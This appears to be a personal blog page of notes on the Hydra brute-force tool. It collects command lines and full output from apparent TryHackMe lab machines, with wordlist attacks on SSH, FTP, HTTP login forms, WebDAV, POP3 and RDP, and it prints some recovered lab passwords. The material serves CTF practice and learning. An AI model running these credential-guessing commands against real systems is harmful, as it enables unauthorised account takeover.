Skip to main content

Hydra: Notes

Hydra: Pentesing Hacking Tool - Brute Force password attack

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra)

Hydra source code: https://gitlab.com/kalilinux/packages/hydra

Hydra

hydra -l chris -P /usr/share/wordlists/common.txt ftp://10.10.242.129

Example of ssh login

hydra -l jessie -P /usr/share/wordlists/rockyou.txt 10.10.65.195 ssh

Yet another example of ssh login

target=10.10.33.252
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://$target

Yet another example of ssh login

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:38:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking ssh://10.10.68.186:22/
[22][ssh] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:38:49

# hydra -l noraj -P /usr/share/wordlists/rockyou-12.txt 10.10.93.131 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-13 09:18:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 555079 login tries (l:1/p:555079), ~34693 tries per task
[DATA] attacking ssh://10.10.93.131:22/
[22][ssh] host: 10.10.93.131   login: noraj   password: cheeseburger
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-13 09:19:08
#

Yet another example of ssh login with unnormal port (80 instead of 22)

root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades# hydra -l jack -P jacks_password_list ssh://10.10.148.230 -s 80
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 18:30:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.148.230:80/
[80][ssh] host: 10.10.148.230   login: jack   password: REDACTED-PASSWORD
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 18:30:07
root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades#

Example of http-post-form login form

# hydra -l frank -P /usr/share/wordlists/rockyou.txt devguru.local http-post-form "/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect." -s 8585
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-07 11:06:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://devguru.local:8585/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect.
[STATUS] 259.00 tries/min, 259 tries in 00:01h, 14344140 to do in 923:03h, 16 active
[STATUS] 142.67 tries/min, 428 tries in 00:03h, 14343971 to do in 1675:42h, 16 active
[STATUS] 160.00 tries/min, 1120 tries in 00:07h, 14343279 to do in 1494:06h, 16 active
[STATUS] 129.53 tries/min, 1943 tries in 00:15h, 14342456 to do in 1845:25h, 16 active
[STATUS] 119.97 tries/min, 3719 tries in 00:31h, 14340680 to do in 1992:18h, 16 active
[8585][http-post-form] host: devguru.local   login: frank
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-07 11:46:38
root@T420:/mnt/f/OneDrive/tryhackme/devguru#

Yet another Example of http-post-form login form

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 http-post-form "/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:33:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-post-form://10.10.68.186:80/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect.
[80][http-post-form] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:33:28
#

Brute force login form Jenkins

root@X220:~ # hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-11 08:58:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[8080][http-post-form] host: localhost   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-11 08:59:38
root@X220:~ #

# ip="deliver.undiscovered.thm"
# hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 19:57:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://deliver.undiscovered.thm:80/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong
[80][http-post-form] host: deliver.undiscovered.thm   login: admin   password: liverpool
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 19:57:38
#

Example of brute force WebDAV

hydra -l wampp -P /usr/share/wordlists/rockyou.txt 10.10.178.82 http-get /webdav

Yet another example of brute force WebDAV

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.25.128 http-get /inferno

# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.234.170 http-head
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-13 15:29:12
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] http-head auth does not work with every server, better use http-get
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-head://10.10.234.170:80/
[STATUS] 1440.00 tries/min, 1440 tries in 00:01h, 14342964 to do in 166:01h, 16 active
[STATUS] 1443.33 tries/min, 4330 tries in 00:03h, 14340074 to do in 165:36h, 16 active
[STATUS] 1421.00 tries/min, 9947 tries in 00:07h, 14334457 to do in 168:08h, 16 active
[80][http-head] host: 10.10.234.170   login: rascal   password: kaylah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-13 15:37:42
#

WebDAV on port 8080

root@T420:~# ip=10.10.66.235
root@T420:~# hydra -l joker -P /usr/share/wordlists/rockyou.txt $ip http-get -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 12:19:49
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-get://10.10.66.235:8080/
[8080][http-get] host: 10.10.66.235   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 12:20:29
root@T420:~#

Example of brute force ftp

root@X220:~# hydra -l jenny -P /usr/share/wordlists/rockyou.txt 10.10.230.70 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 18:18:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.230.70:21/
[21][ftp] host: 10.10.230.70   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 18:18:55
root@X220:~#
hydra http-post-form

Example of brute force POP3

# hydra -l boris -P /usr/share/set/src/fasttrack/wordlist.txt pop3://10.10.192.132 -s 55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:23:17
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 10.10.192.132   login: boris   password: secret1!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:26:15
#

Yet another example of brute force POP3

# hydra -l natalya -P /usr/share/set/src/fasttrack/wordlist.txt 10.10.192.132 -s 55007 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:44:48
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 53.00 tries/min, 53 tries in 00:01h, 169 to do in 00:04h, 16 active
[55007][pop3] host: 10.10.192.132   login: natalya   password: bird
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:47:27
#

Example of brute force RDP

root@T420:~# hydra -t 1 -V -f -l jareth -P /usr/share/wordlists/rockyou.txt rdp://10.10.95.189
....
[3389][rdp] account on 10.10.95.189 might be valid but account not active for remote desktop: login: jareth password: sarah, continuing attacking the account.
....

Practice

>>> THM | Library

>>> THM | Jack of All Trades

>>> THM | Advent of Cyber 1 [2019] - Day 17

>>> THM | GoldenEye

>>> THM | Internal

>>> THM | Year of the Owl

>>> THM | HA Joker CTF

Labels

Labels:

Popular posts from this blog

hmailserver: Notes from the field

hmailserver is one of free open source mail servers running on Microsoft Windows operating system.
Read more

stegseek: Notes

StegCracker has been retired following the release of StegSeek, which will blast through the rockyou.txt wordlist within 1.9 second as opposed to StegCracker which takes ~5 hours.
Read more

Install Microsoft .NET Core SDK

.NET Core Software Development Kit (SDK) is a set of libraries and tools that allow developers to create .NET Core applications and libraries.
Read more